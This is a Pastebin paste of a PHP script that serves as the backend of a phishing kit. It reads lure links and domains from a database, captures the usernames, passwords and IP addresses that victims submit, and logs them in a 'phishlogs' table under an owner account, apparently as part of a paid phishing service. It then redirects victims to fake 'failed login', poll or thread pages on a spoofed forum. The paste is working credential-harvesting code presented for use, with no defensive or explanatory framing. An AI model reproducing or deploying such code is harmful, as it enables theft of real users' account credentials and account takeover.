SHARE
TWEET

Untitled

a guest Jan 25th, 2016 84 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.     session_start();
  3.    
  4.     if (!isset($_POST['username'],$_POST['password'],$_POST['userID']))
  5.         die();
  6.  
  7.     $included = true;
  8.     include_once('db.php');
  9.  
  10.  
  11.     $method = $_POST['method'];
  12.     $dir = $_POST['dir'];
  13.     $userID = $_POST['userID'];
  14.    
  15.     $query = $Database->selectPrepare("SELECT * FROM `phishlinks` Order by `ID` DESC LIMIT 1", array());
  16.         while ($getInfo = $Database->fetchObject($query))
  17.         {
  18.  
  19.         $link1 = $getInfo->link1;
  20.         $link2 = $getInfo->link2;
  21.         $thread1 = $getInfo->thread1;
  22.         $thread2 = $getInfo->thread2;
  23.         $poll1 = $getInfo->poll1;
  24.         $poll2 = $getInfo->poll2;
  25.    
  26.         $amount = $getInfo->amount;
  27.         }
  28.     $query = $Database->selectPrepare("SELECT * FROM `phishdomains` where `domain` = :domain Order by `ID` DESC LIMIT 1", array(":domain" => $domain));
  29.         while ($getDomainInfo = $Database->fetchObject($query))
  30.         {
  31.  
  32.         $linksub = $getDomainInfo->linksub;
  33.         $threadsub = $getDomainInfo->threadsub;
  34.         $pollsub = $getDomainInfo->pollsub;
  35.         $linkssl = $getDomainInfo->linkssl;
  36.         $threadssl = $getDomainInfo->threadssl;
  37.         $pollssl = $getDomainInfo->pollssl;
  38.         }
  39.        
  40.        
  41.     $loginlink = "forums.ws".$link2."";
  42.  
  43.  
  44.     $redirectLocation = "http://bit.ly/Ryv62h";
  45.  
  46.  
  47.  
  48.     switch ($method) {
  49.         case "poll":
  50.             if (!isset($_SESSION['try'])) {
  51.                 $redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed&p";
  52.                 $_SESSION['try'] = 1;
  53.             }
  54.             else if ($_SESSION['try'] == 1) {
  55.                 $redirectLocation = "".$pollssl.$pollsub.".".$domain."/".$poll1."/oldschool/".$dir."/results.php?id=".$userID."&success";
  56.                 unset($_SESSION['try']);
  57.             }
  58.         break;
  59.        
  60.         case "thread":
  61.             if (!isset($_SESSION['try'])) {
  62.                 $redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed&t";
  63.                 $_SESSION['try'] = 1;
  64.             }
  65.             else if ($_SESSION['try'] == 1) {
  66.                 $redirectLocation = "".$threadssl.$threadsub.".".$domain."/".$thread1."/".$loginlink."/".$dir."/?id=".$userID."";
  67.                 unset($_SESSION['try']);
  68.         }
  69.         break;
  70.  
  71.         default:
  72.             if (!isset($_SESSION['try'])) {
  73.                 $redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed";
  74.                 $_SESSION['try'] = 1;
  75.             }
  76.             else if ($_SESSION['try'] == 1) {
  77.                 unset($_SESSION['try']);
  78.         }
  79.     }
  80.  
  81.    
  82.  
  83.     if (isset($_SERVER['HTTP_CF_CONNECTING_IP']))
  84.         $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP'];
  85.  
  86.     $username = $_POST['username'];
  87.     $password = $_POST['password'];
  88.     $ip= $_SERVER['REMOTE_ADDR'];
  89.  
  90.     $strippeduser = strip_tags($username);
  91.     $strippedpass = strip_tags($password);
  92.  
  93.    
  94.         $query = $Database->selectPrepare("SELECT * FROM `users` WHERE `ID` = :ID Order by `ID` DESC LIMIT 1", array(":ID" => $userID));
  95.         while ($getInfo = $Database->fetchObject($query))
  96.         {
  97.         $timezone = $getInfo->timezone;
  98.         $plan = $getInfo->membership;
  99.         }
  100.    
  101.     date_default_timezone_set($timezone);
  102.     $today = time();
  103.    
  104.    
  105. switch ($plan) {
  106.     case 0:
  107.         $owner = 1;
  108.         break;
  109.     default:
  110.         $owner = $userID;
  111. }
  112.    
  113.     $valid = "0";
  114.     $status = 0;
  115.    
  116.     $logcount = $Database->countRow($Database->selectPrepare("SELECT * FROM phishlogs WHERE `user` = :user AND `pass` = :pass AND `ip` = :ip AND `owner` = :owner", array(":user" => $username, ":pass" => $password, ":ip" => $ip, ":owner" => $owner)));
  117.    
  118.    
  119.    
  120.     if ($logcount > 0){
  121.    
  122.     }else{
  123.        
  124.     $Database->selectPrepare("INSERT INTO phishlogs (user, pass, date, ip, owner, status, valid) VALUES (:username, :password, :date, :ip, :owner, :status, :valid)",
  125.         array(':username' => $strippeduser, ':password' => $strippedpass, ':date' => $today, ':ip' => $ip, ':owner' => $owner, ':status' => $status, ':valid' => $valid));
  126.     }
  127.  
  128.     $Database->closeConnection();
  129.     header ('Location: '.$redirectLocation);
  130. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top